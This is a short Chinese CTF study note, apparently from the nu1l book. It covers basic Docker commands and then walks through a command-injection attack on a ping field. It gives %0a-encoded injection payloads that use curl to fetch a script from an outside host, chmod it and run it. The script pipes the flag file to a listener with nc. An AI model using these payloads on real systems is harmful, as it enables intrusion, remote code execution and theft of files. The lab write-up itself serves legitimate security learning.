nu1l-死亡ping命令攻略
book-nu1l
docker
-
虚拟化技术
-
把传统的虚拟机堪称容器
-
依赖镜像启动容器,镜像可以理解为模板克隆的虚拟机,删除容器,对镜像没有影响
-
镜像在云端
-
本地要使用某个镜像,根据地址,直接从云端拉取
-
基本命令
# 查看系统中的 docker docker images# 查看基本信息 docker info# 查看正在运行的容器 docker ps -a# docker 启停 docker start/stop# 建议使用第三方工具 docker-compose # 查看启动工具版本 docker-compose -v # 启动容器的配置,包括端口映射、文件系统映射,将配置编写进去 docker-compose.yml # 启动容器 docker-compose up -d # 关闭 docker-compose down第二章 web进阶
命令执行漏洞
经过尝试,以下字符皆可绕过
%0a %0b %0c %09 %20但是其中能成功执行的是%0a
将以下内容写入.sh文件
此处ip为kali的ip,当然这是靶机服务器在局域网内或者本地docker的情况下可用,如果是跨网段的,则需要查看公网ip使用公网ip
ls cat /FLAG | nc 10.4.7.138 8089
使用bp抓包放进中继
将ip部分修改为,传过去sh文件
ip=127.0.0.1%0acurl 10.9.47.141/9.sh > /tmp/9.sh
赋权
127.0.0.1%0achmod 777 /tmp/9.sh
执行文件
127.0.0.1%0ash /tmp/9.sh
得到flag
如果实在某些靶场内,获取flag则需要修改执行命令为ls /tmp或/root下
